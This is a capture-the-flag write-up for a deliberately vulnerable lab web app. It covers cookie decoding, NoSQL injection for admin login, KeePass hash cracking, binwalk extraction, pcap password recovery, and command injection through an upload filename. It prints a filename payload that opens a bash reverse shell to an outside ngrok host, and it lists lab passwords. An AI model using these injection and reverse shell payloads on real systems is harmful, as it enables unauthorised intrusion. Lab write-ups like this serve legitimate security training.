Day 6 Challenge Writeups

Team

Vulnbydefault Day 6 Writeup

Opening the site URL, we land on the application's front page.

Let's register a user on the register page.

Let's log in with that user.

We get a dashboard. It has file-upload functionality.

Let's upload a file.

Let's check the cookies.

Flag 1

There is a data cookie; let's decode it. Use this site:

Flag 2

Let's check the login endpoint.

Let's test for NoSQL injection.

We got admin access.

Flag 3

The admin user already has 3 files.

Let's check the first one, a KeePass file.

It is protected by a master password.

Let's use keepass2john to get the hash of the file.

Save the hash without the first part, which contains the filename: copy everything after the first colon (:).

The database has two entries. Let's check the secret db entry.

Flag 3


The root pass entry has nothing useful.

Let's check the other files from the admin dashboard.

Use this command, changing the cookie value:

curl -H 'Cookie: session=<value>'  http://IP:PORT/download/street.jpg -o street.jpg

We use binwalk to check for hidden data:

binwalk -e street.jpg

Let's check the extraction folder.

It contains the developer password.

Let's check another file from the admin dashboard.

Use the following command to get that file, changing the cookie value:

curl -H 'Cookie: session=<value>'  http://127.0.0.1:8002/download/dump.pcapng -o dump.pcapng

Let's open this file in Wireshark.

Let's check the protocol hierarchy.

Use the http filter to show only the HTTP traffic.

Let's follow the TCP stream.

Alright, we got the password.

RCE

Let's check the upload request.

Let's check for command injection in the filename:

filename="trap.txt; sleep 10"

As you can see, the response comes back after 10 seconds. This confirms that we have RCE through this field.

Let's make a reverse shell payload:

filename="trap.txt;bash -c 'bash -i >&/dev/tcp/ngrok/port 0>&1'"

We got a reverse shell.

Let's check which applications are running on this machine.

MongoDB is running.

Let's use mongosh to access it:

mongosh

Flag 5

Let's check the users collection.

Alright, we got the admin user password.

Flag 6

Let's use the password we got from the dump file:

developer:Ikn0wyw0uldc0meh3r3


user.txt

Let's use the password from the database for admin:

admin:r00tm31fy0uc4n123


root.txt

Let's check the sudo privileges of the admin user.

Let's check the mail for the admin user.

Use this password for the root part: root:1fy0ukn0wy0ukn0w

RCE Discussion

I know most people would ask why there is RCE in the filename.

Let me show you the source code.

This is the check for the zip-slip vulnerability (which would otherwise let a user perform an arbitrary file write).

For more information read the following blog:

https://security.snyk.io/research/zip-slip-vulnerability